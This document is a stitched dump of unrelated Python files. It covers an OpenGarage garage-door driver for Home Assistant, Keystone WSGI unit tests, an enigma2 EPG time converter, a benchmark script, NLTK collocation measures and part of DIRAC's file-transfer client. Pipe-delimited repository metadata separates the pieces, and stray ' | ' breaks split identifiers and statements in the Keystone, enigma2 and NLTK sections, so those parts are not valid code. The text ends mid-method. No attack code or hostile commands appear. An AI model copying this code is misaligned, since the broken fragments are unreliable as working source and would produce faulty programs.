STATE_CLOSING = "closing"
STATE_STOPPED = "stopped"
STATE_OFFLINE = "offline"
STATES_MAP = {
0: STATE_CLOSED,
1: STATE_OPEN
}
# Validation of the user's configuration
COVER_SCHEMA = vol.Schema({
vol.Required(CONF_DEVICEKEY): cv.string,
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME): cv.string
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_COVERS): vol.Schema({cv.slug: COVER_SCHEMA}),
})
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up OpenGarage covers from the validated platform config."""
    covers = [
        OpenGarageCover(hass, {
            CONF_NAME: device_config.get(CONF_NAME),
            CONF_HOST: device_config.get(CONF_HOST),
            CONF_PORT: device_config.get(CONF_PORT),
            "device_id": device_config.get(CONF_DEVICE, device_id),
            CONF_DEVICEKEY: device_config.get(CONF_DEVICEKEY),
        })
        for device_id, device_config in config.get(CONF_COVERS).items()
    ]
    add_devices(covers, True)
class OpenGarageCover(CoverDevice):
    """Representation of an OpenGarage cover (garage door controller)."""

    # pylint: disable=no-self-use
    def __init__(self, hass, args):
        """Initialize the cover.

        ``args`` carries CONF_NAME/CONF_HOST/CONF_PORT, the device id and
        the device key used to authenticate button presses.
        """
        self.opengarage_url = 'http://{}:{}'.format(
            args[CONF_HOST],
            args[CONF_PORT])
        self.hass = hass
        self._name = args[CONF_NAME]
        self.device_id = args['device_id']
        self._devicekey = args[CONF_DEVICEKEY]
        # Last known door state; refined on the first update() cycle.
        self._state = STATE_UNKNOWN
        # State captured before a commanded move; restored on failure.
        self._state_before_move = None
        self.dist = None     # last distance-sensor reading, if any
        self.signal = None   # last wifi RSSI reading, if any
        self._available = True

    @property
    def name(self):
        """Return the name of the cover."""
        return self._name

    @property
    def available(self):
        """Return True if entity is available."""
        return self._available

    @property
    def device_state_attributes(self):
        """Return the device state attributes."""
        data = {}
        if self.signal is not None:
            data[ATTR_SIGNAL_STRENGTH] = self.signal
        if self.dist is not None:
            data[ATTR_DISTANCE_SENSOR] = self.dist
        if self._state is not None:
            data[ATTR_DOOR_STATE] = self._state
        return data

    @property
    def is_closed(self):
        """Return if the cover is closed.

        Returns None while the state is unknown; a door that is still
        opening is reported as closed until the move completes.
        """
        if self._state == STATE_UNKNOWN:
            return None
        return self._state in [STATE_CLOSED, STATE_OPENING]

    def close_cover(self):
        """Close the cover (no-op if already closed/closing)."""
        if self._state not in [STATE_CLOSED, STATE_CLOSING]:
            self._state_before_move = self._state
            self._state = STATE_CLOSING
            self._push_button()

    def open_cover(self):
        """Open the cover (no-op if already open/opening)."""
        if self._state not in [STATE_OPEN, STATE_OPENING]:
            self._state_before_move = self._state
            self._state = STATE_OPENING
            self._push_button()

    def update(self):
        """Get updated status from the device's JSON API."""
        try:
            status = self._get_status()
            if self._name is None:
                if status["name"] is not None:
                    self._name = status["name"]
            state = STATES_MAP.get(status.get('door'), STATE_UNKNOWN)
            if self._state_before_move is not None:
                # Only accept the polled state once it differs from the
                # pre-move state, i.e. the commanded move has taken effect.
                if self._state_before_move != state:
                    self._state = state
                    self._state_before_move = None
            else:
                self._state = state
            _LOGGER.debug("%s status: %s", self._name, self._state)
            self.signal = status.get('rssi')
            self.dist = status.get('dist')
            self._available = True
        except requests.exceptions.RequestException as ex:
            _LOGGER.error('Unable to connect to OpenGarage device: %(reason)s',
                          dict(reason=ex))
            # NOTE(review): _available stays True here even though the state
            # becomes offline -- confirm whether it should be set to False.
            self._state = STATE_OFFLINE

    def _get_status(self):
        """Return the latest status dict from the /jc endpoint."""
        url = '{}/jc'.format(self.opengarage_url)
        ret = requests.get(url, timeout=10)
        return ret.json()

    def _push_button(self):
        """Send the door-toggle (button click) command to the API."""
        url = '{}/cc?dkey={}&click=1'.format(
            self.opengarage_url, self._devicekey)
        try:
            response = requests.get(url, timeout=10).json()
            # result == 2 means the device rejected the key.
            if response["result"] == 2:
                _LOGGER.error("Unable to control %s: device_key is incorrect.",
                              self._name)
                self._state = self._state_before_move
                self._state_before_move = None
        except requests.exceptions.RequestException as ex:
            _LOGGER.error('Unable to connect to OpenGarage device: %(reason)s',
                          dict(reason=ex))
            self._state = self._state_before_move
            self._state_before_move = None

    @property
    def device_class(self):
        """Return the class of this device, from component DEVICE_CLASSES."""
        return 'garage'

    @property
    def supported_features(self):
        """Flag supported features."""
        return SUPPORT_OPEN | SUPPORT_CLOSE
|
atheendra/access_keys | keystone/tests/test_wsgi.py | Python | apache-2.0 | 12,889 | 0 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import gettext
import socket
import uuid
from babel import localedata
import mock
import webob
from keystone.common import environment
from keystone.common import wsgi
from keystone import exception
from keystone.openstack.common.fixture import mockpatch
from keystone.openstack.common import gettextutils
from keystone.openstack.common.gettextutils import _
from keystone.openstack.common import jsonutils
from keystone import tests
class FakeApp(wsgi.Application):
    """Minimal wsgi.Application stub whose 'index' action returns a dict."""
    def index(self, context):
        # ApplicationTest expects this dict to come back as a JSON body.
        return {'a': 'b'}
class BaseWSGITest(tests.TestCase):
    """Shared fixture: a FakeApp instance plus a pre-routed request factory."""

    def setUp(self):
        self.app = FakeApp()
        super(BaseWSGITest, self).setUp()

    def _make_request(self, url='/'):
        """Build a blank webob request whose routing args invoke 'index'."""
        request = webob.Request.blank(url)
        request.environ['wsgiorg.routing_args'] = [
            None, {'action': 'index', 'controller': None}]
        return request
class ApplicationTest(BaseWSGITest):
def test_response_content_type(self):
req = self._make_request()
resp = req.get_response(self.app)
self.assertEqual(resp.content_type, 'application/json')
def test_query_string_available(self):
class FakeApp(wsgi.Application):
def index(self, context):
return context['query_string']
req = self._make_request(url='/?1=2')
resp = req.get_response(FakeApp())
self.assertEqual(jsonutils.loads(resp.body), {'1': '2'})
def test_headers_available(self):
class FakeApp(wsgi.Application):
def index(self, context):
return context['headers']
app = FakeApp()
req = self._make_request(url='/?1=2')
req.headers['X-Foo'] = "bar"
resp = req.get_response(app)
self.assertIn('X-Foo', eval(resp.body))
def test_render_response(self):
data = {'attribute': 'value'}
body = '{"attribute": "value"}'
resp = wsgi.render_response(body=data)
self.assertEqual(resp.status, '200 OK')
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, body)
self.assertEqual(resp.headers.get('Vary'), 'X-Auth-Token')
self.assertEqual(resp.headers.get('Content-Length'), str(len(body)))
def test_render_response_custom_status(self):
resp = wsgi.render_response(status=(501, 'Not Implemented'))
self.assertEqual(resp.status, '501 Not Implemented')
self.assertEqual(resp.status_int, 501)
def test_render_response_custom_headers(self):
resp = wsgi.render_response(headers=[('Custom-Header', 'Some-Value')])
self.assertEqual(resp.headers.get('Custom-Header'), 'Some-Value')
self.assertEqual(resp.headers.get('Vary'), 'X-Auth-Token')
def test_render_response_no_body(self):
resp = wsgi.render_response()
self.assertEqual(resp.status, '204 No Content')
self.assertEqual(resp.status_int, 204)
self.assertEqual(resp.body, '')
self.assertEqual(resp.headers.get('Content-Length'), '0')
self.assertIsNone(resp.headers.get('Content-Type'))
def test_application_local_config(self):
class FakeApp(wsgi.Application):
def __init__(self, *args, **kwargs):
self.kwargs = kwargs
app = FakeApp.factory({}, testkey="test")
self.assertIn("testkey", app.kwargs)
self.assertEqual("test", app.kwargs["testkey"])
def test_render_exception(self):
e = exception.Unauthorized(message=u'\u7f51\u7edc')
resp = wsgi.render_exception(e)
self.assertEqual(resp.status_int, 401)
def test_render_exception_host(self):
e = exception.Unauthorized(message=u'\u7f51\u7edc')
context = {'host_url': 'http://%s:5000' % uuid.uuid4().hex}
resp = wsgi.render_exception(e, context=context)
self.assertEqual(resp.status_int, 401)
class ExtensionRouterTest(BaseWSGITest):
    def test_extensionrouter_local_config(self):
        """Factory-supplied local config kwargs must reach the router."""
        class FakeRouter(wsgi.ExtensionRouter):
            def __init__(self, *args, **kwargs):
                # Capture kwargs instead of running real router setup.
                self.kwargs = kwargs
        factory = FakeRouter.factory({}, testkey="test")
        app = factory(self.app)
        self.assertIn("testkey", app.kwargs)
        self.assertEqual("test", app.kwargs["testkey"])
class MiddlewareTest(BaseWSGITest):
def test_middleware_request(self):
class FakeMiddleware(wsgi.Middleware):
def process_request(self, req):
req.environ['fake_request'] = True
return req
req = self._make_request()
resp = FakeMiddleware(None)(req)
self.assertIn('fake_request', resp.environ)
| def test_middleware_response(self):
class FakeMiddleware(wsgi. | Middleware):
def process_response(self, request, response):
response.environ = {}
response.environ['fake_response'] = True
return response
req = self._make_request()
resp = FakeMiddleware(self.app)(req)
self.assertIn('fake_response', resp.environ)
def test_middleware_bad_request(self):
class FakeMiddleware(wsgi.Middleware):
def process_response(self, request, response):
raise exception.Unauthorized()
req = self._make_request()
req.environ['REMOTE_ADDR'] = '127.0.0.1'
resp = FakeMiddleware(self.app)(req)
self.assertEqual(resp.status_int, exception.Unauthorized.code)
def test_middleware_type_error(self):
class FakeMiddleware(wsgi.Middleware):
def process_response(self, request, response):
raise TypeError()
req = self._make_request()
req.environ['REMOTE_ADDR'] = '127.0.0.1'
resp = FakeMiddleware(self.app)(req)
# This is a validationerror type
self.assertEqual(resp.status_int, exception.ValidationError.code)
def test_middleware_exception_error(self):
exception_str = 'EXCEPTIONERROR'
class FakeMiddleware(wsgi.Middleware):
def process_response(self, request, response):
raise exception.UnexpectedError(exception_str)
def do_request():
req = self._make_request()
resp = FakeMiddleware(self.app)(req)
self.assertEqual(resp.status_int, exception.UnexpectedError.code)
return resp
# Exception data should not be in the message when debug is False
self.config_fixture.config(debug=False)
self.assertNotIn(exception_str, do_request().body)
# Exception data should be in the message when debug is True
self.config_fixture.config(debug=True)
self.assertIn(exception_str, do_request().body)
def test_middleware_local_config(self):
class FakeMiddleware(wsgi.Middleware):
def __init__(self, *args, **kwargs):
self.kwargs = kwargs
factory = FakeMiddleware.factory({}, testkey="test")
app = factory(self.app)
self.assertIn("testkey", app.kwargs)
self.assertEqual("test", app.kwargs["testkey"])
class LocalizedResponseTest(tests.TestCase):
def setUp(self):
super(LocalizedResponseTest, self).setUp()
gettextutils._AVAILABLE_LANGUAGES.clear()
self.addCleanup(gettextutils._AVAILABLE_LANGUAGES.clear)
def _set_expected_languages(self, all_locales, avail_locales=None):
# Override localedata.locale_identifiers to return some locales.
def returns_some_locales(*args, **kwargs):
return all_locales
self.useFixture(mockpatch.PatchObject(
|
atvcaptain/enigma2 | lib/python/Components/Converter/EventTime.py | Python | gpl-2.0 | 7,587 | 0.027547 | from __future__ import absolute_import
from Components.Converter.Converter import Converter
from Components.Converter.Poll import Poll
from time import time
from Components.Element import cached, ElementError
from Components.config import config
from enigma import eEPGCache
class EventTime(Poll, Converter, object):
STARTTIME = 0
ENDTIME = 1
REMAINING = 2
REMAINING_VFD = 3
PROGRESS = 4
DURATION = 5
ELAPSED = 6
ELAPSED_VFD = 7
NEXT_START_TIME = 8
NEXT_END_TIME = 9
NEXT_DURATION = 10
THIRD_START_TIME = 11
THIRD_END_TIME = 12
THIRD_DURATION = 13
TIMES = 14
NEXT_TIMES = 15
THIRD_TIMES = 16
def __init__(self, type):
Converter.__init__(self, type)
Poll.__init__(self)
self.epgcache = eEPGCache.getInstance()
if type == "EndTime":
self.type = self.ENDTIME
elif type == "Remaining":
self.type = self.REMAINING
self.poll_interval = 60 * 1000
self.poll_enabled = True
elif type == "VFDRemaining":
self.type = self.REMAINING_VFD
self.poll_interval = 60 * 1000
self.poll_enabled = True
elif type == "StartTime":
self.type = self.STARTTIME
elif type == "Duration":
self.type = self.DURATION
elif type == "Progress":
self.type = self.PROGRESS
self.poll_interval = 30 * 1000
self.poll_enabled = True
elif type == "Elapsed":
self.type = self.ELAPSED
self.poll_interval = 60 * 1000
self.poll_enabled = True
elif type == "VFDElapsed":
self.type = self.ELAPSED_VFD
self.poll_interval = 60 * 1000
self.poll_enabled = True
elif type == "NextStartTime":
self.type = self.NEXT_START_TIME
elif type == "NextEndTime":
self.type = self.NEXT_END_TIME
elif type == "NextDuration":
self.type = self.NEXT_DURATION
elif type == "ThirdStartTime":
self.type = self.THIRD_START_TIME
elif ty | pe == "ThirdEndTime":
self.type = self.THIRD_END_TIME
elif type == "ThirdDuration":
self.type = self.THIRD_DURATION
elif type == "Times":
self.type = self.TIMES |
elif type == "NextTimes":
self.type = self.NEXT_TIMES
elif type == "ThirdTimes":
self.type = self.THIRD_TIMES
else:
raise ElementError("'%s' is not <StartTime|EndTime|Remaining|Elapsed|Duration|Progress|VFDRemaining|VFDElapsed|NextStartTime|NextEndTime|NextDuration|ThirdStartTime|ThirdEndTime|ThirdDuration|Times|NextTimes|ThirdTimes> for EventTime converter" % type)
@cached
def getTime(self):
assert self.type != self.PROGRESS
event = self.source.event
if event is None:
return None
st = event.getBeginTime()
if self.type == self.STARTTIME:
return st
duration = event.getDuration()
if self.type == self.DURATION:
return duration
et = st + duration
if self.type == self.ENDTIME:
return et
if self.type == self.TIMES:
return (st, et)
if self.type in (self.REMAINING, self.REMAINING_VFD, self.ELAPSED, self.ELAPSED_VFD):
now = int(time())
remaining = et - now
if remaining < 0:
remaining = 0
start_time = event.getBeginTime()
end_time = start_time + duration
elapsed = now - start_time
if start_time <= now <= end_time:
if self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "0":
return duration, remaining
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "1":
return duration, elapsed
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "2":
return duration, elapsed, remaining
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "3":
return duration, remaining, elapsed
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "0":
return duration, elapsed
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "1":
return duration, remaining
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "2":
return duration, elapsed, remaining
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "3":
return duration, remaining, elapsed
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "0":
return duration, remaining
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "1":
return duration, elapsed
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "2":
return duration, elapsed, remaining
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "3":
return duration, remaining, elapsed
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "0":
return duration, elapsed
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "1":
return duration, remaining
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "2":
return duration, elapsed, remaining
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "3":
return duration, remaining, elapsed
else:
return duration, None
elif self.type in (self.NEXT_START_TIME, self.NEXT_END_TIME, self.NEXT_DURATION, self.THIRD_START_TIME, self.THIRD_END_TIME, self.THIRD_DURATION, self.NEXT_TIMES, self.THIRD_TIMES):
reference = self.source.service
info = reference and self.source.info
if info is None:
return
test = ['IBDCX', (reference.toString(), 1, -1, 1440)] # search next 24 hours
self.list = [] if self.epgcache is None else self.epgcache.lookupEvent(test)
if self.list:
try:
if self.type == self.NEXT_START_TIME and self.list[1][1]:
return self.list[1][1]
elif self.type == self.NEXT_DURATION and self.list[1][2]:
return self.list[1][2]
elif self.type == self.NEXT_END_TIME and self.list[1][1] and self.list[1][2]:
return int(self.list[1][1]) + int(self.list[1][2])
elif self.type == self.NEXT_TIMES and self.list[1][1] and self.list[1][2]:
return (int(self.list[1][1]), int(self.list[1][1]) + int(self.list[1][2]))
elif self.type == self.THIRD_START_TIME and self.list[2][1]:
return self.list[2][1]
elif self.type == self.THIRD_DURATION and self.list[2][2]:
return self.list[2][2]
elif self.type == self.THIRD_END_TIME and self.list[2][1] and self.list[2][2]:
return int(self.list[2][1]) + int(self.list[2][2])
elif self.type == self.THIRD_TIMES and self.list[2][1] and self.list[2][2]:
return (int(self.list[2][1]), int(self.list[2][1]) + int(self.list[2][2]))
else:
# failed to return any epg data.
return None
except:
# failed to return any epg data.
return None
@cached
def getValue(self):
assert self.type == self.PROGRESS
event = self.source.event
if event is None:
return None
progress = int(time()) - event.getBeginTime()
duration = event.getDuration()
if duration > 0 and progress >= 0:
if progress > duration:
progress = duration
return progress * 1000 / duration
else:
return None
time = property(getTime)
value = property(getValue)
range = 1000
def changed(self, what):
Converter.changed(self, what)
if self.type == self.PROGRESS and len(self.downstream_elements):
if not self.source.event and self.downstream_elements[0].visible:
self.downstream_elements[0].visible = False
elif self.source.event and not self.downstream_elements[0].visible:
self.downstream_elements[0].visible = True
|
ml9951/ghc | libraries/pastm/examples/damp-comparing-linked-lists/bench.py | Python | bsd-3-clause | 1,511 | 0.017869 | #!/usr/bin/env python
"""Benchmark driver: builds each STM implementation and records run times.

For every (make target, binary) pair the script rebuilds the program, runs
it on 1..cores capabilities for the requested number of iterations, scrapes
the reported time from stdout, and appends one row per implementation to
Times.txt.
"""
import argparse, subprocess, pdb, re  # pdb kept although unused (debugging aid)

parser = argparse.ArgumentParser()
parser.add_argument("-iters", type=int, help="Number of iterations for each STM implementation", default=3)
parser.add_argument("-opt", type=str, help="Optimization level", default="")
parser.add_argument("-cores", type=int, help="Number of cores to go up to", default=4)
parser.add_argument("-stm", type=str, help="Which STM to use", default="partial")
args = parser.parse_args()

# (make target, produced binary name) pairs.
makeCmds = [('mvar', 'mvar'), ('partial straight', 'straightForwardParital'),
            ('partial dissected', 'dissectedPartial'), ('cas', 'cas')]
filename = 'Times.txt'

# Header row: one column per (core, iteration) pair.  Written directly with
# Python I/O instead of shelling out to `echo` (no quoting pitfalls).
header = ' ' + ''.join('C' + str(i) + '-' + str(j) + ' '
                       for i in range(args.cores)
                       for j in range(args.iters))
with open(filename, 'w') as out:
    out.write(header + '\n')

# Precompiled patterns for scraping "Time = <float>" from program output.
time_line_re = re.compile(r'Time = .*')
float_re = re.compile(r'[0-9]*\.[0-9]*')

for cmd, prog in makeCmds:
    subprocess.Popen('make ' + cmd + ' OPT="' + args.opt + '"', shell=True).wait()
    row = cmd + ' '
    for i in range(args.cores):
        for j in range(args.iters):
            print('./' + prog + args.opt + ' +RTS -N' + str(i + 1) + '(iteration ' + str(j) + ')')
            output = subprocess.check_output(
                './' + prog + args.opt + ' +RTS -N' + str(i + 1), shell=True)
            match = time_line_re.search(str(output))
            match = float_re.search(match.group(0))
            row = row + match.group(0) + ' '
    with open(filename, 'a') as out:
        out.write(row + '\n')
|
adazey/Muzez | libs/nltk/metrics/association.py | Python | gpl-3.0 | 15,878 | 0.0017 | # Natural Language Toolkit: Ngram Association Measures
#
# Copyright (C) 2001-2016 NLTK Project
# Author: Joel Nothman <jnothman@student.usyd.edu.au>
# URL: <http://nltk.org>
# For license information, see LICENSE.TXT
"""
Provides scoring functions for a number of association measures through a
generic, abstract implementation in ``NgramAssocMeasures``, and n-specific
``BigramAssocMeasures`` and ``TrigramAssocMeasures``.
"""
from __future__ import division
import math as _math
from functools import reduce
_log2 = lambda x: _math.log(x, 2.0)
_ln = _math.log
_product = lambda s: reduce(lambda x, y: x * y, s)
_SMALL = 1e-20
try:
    from scipy.stats import fisher_exact
except ImportError:
    # SciPy is an optional dependency; without it the Fisher measure
    # fails loudly with an actionable message instead of a bare error.
    def fisher_exact(*_args, **_kwargs):
        """Stub raised in place of scipy.stats.fisher_exact."""
        raise NotImplementedError(
            "Fisher's exact test requires SciPy (scipy.stats.fisher_exact)")
### Indices to marginals arguments:
NGRAM = 0
"""Marginals index for the ngram count"""
UNIGRAMS = -2
"""Marginals index for a tuple of each unigram count"""
TOTAL = -1
"""Marginals index for the number of words in the data"""
class NgramAssocMeasures(object):
    """
    An abstract class defining a collection of generic association measures.
    Each public method returns a score, taking the following arguments::
        score_fn(count_of_ngram,
            (count_of_n-1gram_1, ..., count_of_n-1gram_j),
            (count_of_n-2gram_1, ..., count_of_n-2gram_k),
            ...,
            (count_of_1gram_1, ..., count_of_1gram_n),
            count_of_total_words)
    See ``BigramAssocMeasures`` and ``TrigramAssocMeasures``
    Inheriting classes should define a property _n, and a method _contingency
    which calculates contingency values from marginals in order for all
    association measures defined here to be usable.
    """
    # Order of the ngram; subclasses override (2 for bigrams, etc.).
    _n = 0
    @staticmethod
    def _contingency(*marginals):
        """Calculates values of a contingency table from marginal values."""
        # NOTE(review): the two adjacent string literals concatenate
        # without a space ("...availablein the...").
        raise NotImplementedError("The contingency table is not available"
            "in the general ngram case")
    @staticmethod
    def _marginals(*contingency):
        """Calculates values of contingency table marginals from its values."""
        # NOTE(review): same missing space between the two literals as above.
        raise NotImplementedError("The contingency table is not available"
            "in the general ngram case")
    @classmethod
    def _expected_values(cls, cont):
        """Calculates expected values for a contingency table."""
        n_all = sum(cont)
        # One bit per ngram position; a cell index's bits select which
        # events are "present" in that cell.
        bits = [1 << i for i in range(cls._n)]
        # For each contingency table cell
        for i in range(len(cont)):
            # Yield the expected value: product of the matching marginal
            # sums divided by n_all^(n-1) (independence assumption).
            yield (_product(sum(cont[x] for x in range(2 ** cls._n)
                if (x & j) == (i & j))
                for j in bits) /
                (n_all ** (cls._n - 1)))
    @staticmethod
    def raw_freq(*marginals):
        """Scores ngrams by their frequency"""
        return marginals[NGRAM] / marginals[TOTAL]
    @classmethod
    def student_t(cls, *marginals):
        """Scores ngrams using Student's t test with independence hypothesis
        for unigrams, as in Manning and Schutze 5.3.1.
        """
        # (observed - expected) / sqrt(observed); _SMALL guards /0.
        return ((marginals[NGRAM] -
            _product(marginals[UNIGRAMS]) /
            (marginals[TOTAL] ** (cls._n - 1))) /
            (marginals[NGRAM] + _SMALL) ** .5)
    @classmethod
    def chi_sq(cls, *marginals):
        """Scores ngrams using Pearson's chi-square as in Manning and Schutze
        5.3.3.
        """
        cont = cls._contingency(*marginals)
        exps = cls._expected_values(cont)
        # Sum of (observed - expected)^2 / expected over all cells.
        return sum((obs - exp) ** 2 / (exp + _SMALL)
            for obs, exp in zip(cont, exps))
    @staticmethod
    def mi_like(*marginals, **kwargs):
        """Scores ngrams using a variant of mutual information. The keyword
        argument power sets an exponent (default 3) for the numerator. No
        logarithm of the result is calculated.
        """
        return (marginals[NGRAM] ** kwargs.get('power', 3) /
            _product(marginals[UNIGRAMS]))
    @classmethod
    def pmi(cls, *marginals):
        """Scores ngrams by pointwise mutual information, as in Manning and
        Schutze 5.4.
        """
        # log2( P(ngram) / prod P(unigram_i) ), written with counts.
        return (_log2(marginals[NGRAM] * marginals[TOTAL] ** (cls._n - 1)) -
            _log2(_product(marginals[UNIGRAMS])))
    @classmethod
    def likelihood_ratio(cls, *marginals):
        """Scores ngrams using likelihood ratios as in Manning and Schutze 5.3.4.
        """
        cont = cls._contingency(*marginals)
        # 2*n would be the textbook factor; here the class order _n scales
        # the sum of obs * ln(obs/exp) terms.
        return (cls._n *
            sum(obs * _ln(obs / (exp + _SMALL) + _SMALL)
                for obs, exp in zip(cont, cls._expected_values(cont))))
    @classmethod
    def poisson_stirling(cls, *marginals):
        """Scores ngrams using the Poisson-Stirling measure."""
        # Expected count under independence of the unigrams.
        exp = (_product(marginals[UNIGRAMS]) /
            (marginals[TOTAL] ** (cls._n - 1)))
        return marginals[NGRAM] * (_log2(marginals[NGRAM] / exp) - 1)
    @classmethod
    def jaccard(cls, *marginals):
        """Scores ngrams using the Jaccard index."""
        cont = cls._contingency(*marginals)
        # ngram count over all cells where at least one event occurs
        # (every cell except the final all-absent one).
        return cont[0] / sum(cont[:-1])
class BigramAssocMeasures(NgramAssocMeasures):
"""
A collection of bigram association measures. Each association measure
is provided as a function with three arguments::
bigram_score_fn(n_ii, (n_ix, n_xi), n_xx)
The arguments constitute the marginals of a contingency table, counting
the occurrences of particular events | in a corpus. The letter i in the
suffix refers to the appearance of the word in question, while x indicates
the appearance of any word. Thus, for example:
n_ii counts (w1, w2), i.e. the bigram being scored
n_ | ix counts (w1, *)
n_xi counts (*, w2)
n_xx counts (*, *), i.e. any bigram
This may be shown with respect to a contingency table::
w1 ~w1
------ ------
w2 | n_ii | n_oi | = n_xi
------ ------
~w2 | n_io | n_oo |
------ ------
= n_ix TOTAL = n_xx
"""
_n = 2
@staticmethod
def _contingency(n_ii, n_ix_xi_tuple, n_xx):
"""Calculates values of a bigram contingency table from marginal values."""
(n_ix, n_xi) = n_ix_xi_tuple
n_oi = n_xi - n_ii
n_io = n_ix - n_ii
return (n_ii, n_oi, n_io, n_xx - n_ii - n_oi - n_io)
@staticmethod
def _marginals(n_ii, n_oi, n_io, n_oo):
"""Calculates values of contingency table marginals from its values."""
return (n_ii, (n_oi + n_ii, n_io + n_ii), n_oo + n_oi + n_io + n_ii)
@staticmethod
def _expected_values(cont):
"""Calculates expected values for a contingency table."""
n_xx = sum(cont)
# For each contingency table cell
for i in range(4):
yield (cont[i] + cont[i ^ 1]) * (cont[i] + cont[i ^ 2]) / n_xx
@classmethod
def phi_sq(cls, *marginals):
"""Scores bigrams using phi-square, the square of the Pearson correlation
coefficient.
"""
n_ii, n_io, n_oi, n_oo = cls._contingency(*marginals)
return ((n_ii*n_oo - n_io*n_oi)**2 /
((n_ii + n_io) * (n_ii + n_oi) * (n_io + n_oo) * (n_oi + n_oo)))
@classmethod
def chi_sq(cls, n_ii, n_ix_xi_tuple, n_xx):
"""Scores bigrams using chi-square, i.e. phi-sq multiplied by the number
of bigrams, as in Manning and Schutze 5.3.3.
"""
(n_ix, n_xi) = n_ix_xi_tuple
return n_xx * cls.phi_sq(n_ii, (n_ix, n_xi), n_xx)
@classmethod
def fisher(cls, *marginals):
"""Scores bigrams using Fisher's Exact Test (Pedersen 1996). Less
sensitive to small counts than PMI or Chi Sq, but also more expensive
to compute. Requires scipy.
"""
n_ii, n_io, n_oi, n_oo = |
andresailer/DIRAC | Core/DISET/TransferClient.py | Python | gpl-3.0 | 6,920 | 0.034682 | """ This is for transfers what RPCClient is for RPC calls
"""
__RCSID__ = "$Id$"
import os
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Utilities import File
from DIRAC.Core.DISET.private.BaseClient import BaseClient
from DIRAC.Core.DISET.private.FileHelper import FileHelper
class TransferClient( BaseClient ):
def _sendTransferHeader( self, actionName, fileInfo ):
"""
Send the header of the transfer
:type actionName: string
:param actionName: Action to execute
:type fileInfo: tuple
:param fileInfo: Information of the target file/bulk
:return: S_OK/S_ERROR
"""
retVal = self._connect()
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
#FFC -> File from Client
retVal = self._proposeAction( transport, ( "FileTransfer", actionName ) )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.sendData( S_OK( fileInfo ) )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
if not retVal[ 'OK' ]:
return retVal
return S_OK( ( trid, transport ) )
except Exception as e:
self._disconnect( trid )
return S_ERROR( "Cound not request transfer: %s" % str( e ) )
def sendFile( self, filename, fileId, token = "" ):
"""
Send a file to server
:type filename : string / file descriptor / file object
:param filename : File to send to server
:type fileId : any
:param fileId : Identification of the file being sent
:type token : string
:param token : Optional token for the file
:return : S_OK/S_ERROR
"""
fileHelper = FileHelper()
if "NoCheckSum" in token:
fileHelper.disableCheckSum()
retVal = fileHelper.getFileDescriptor( filename, "r" )
if not retVal[ 'OK' ]:
return retVal
fd = retVal[ 'Value' ]
retVal = self._sendTransferHeader( "FromClient", ( fileId, token, File.getSize( filename ) ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
fileHelper.setTransport( transport )
retVal = fileHelper.FDToNetwork( fd )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
return retVal
finally:
self._disconnect( trid )
def receiveFile( self, filename, fileId, token = "" ):
"""
Receive a file from the server
:type filename : string / file descriptor / file object
:param filename : File to receive from server
:type fileId : any
:param fileId : Identification of the file being received
:type token : string
:param token : Optional token for the file
:return : S_OK/S_ERROR
"""
fileHelper = FileHelper()
if "NoCheckSum" in token:
fileHelper.disableCheckSum()
retVal = fileHelper.getDataSink( filename )
if not retVal[ 'OK' ]:
return retVal
dS = retVal[ 'Value' ]
closeAfterUse = retVal[ 'closeAfterUse' ]
retVal = self._sendTransferHeader( "ToClient", ( fileId, token ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
fileHelper.setTransport( transport )
retVal = fileHelper.networkToDataSink( dS )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
if closeAfterUse:
dS.close()
return retVal
finally:
self._disconnect( trid )
def __checkFileList( self, fileList ):
bogusEntries = []
for entry in fileList:
if not os.path.exists( entry ):
bogusEntries.append( entry )
return bogusEntries
def sendBulk( self, fileList, bulkId, token = "", compress = True, bulkSize = -1, onthefly = True ):
"""
Send a bulk of files to server
:type fileList : list of ( string / file descriptor / file object )
:param fileList : Files to send to server
:type bulkId : any
:param bulkId : Identification of the files being sent
:type token : string
:param token : Token for the bulk
:type compress : boolean
:param compress : Enable compression for the bulk. By default its True
:type bulkSize : integer
:param bulkSize : Optional size of the bulk
:return : S_OK/S_ERROR
"""
bogusEntries = self.__checkFileList( fileList )
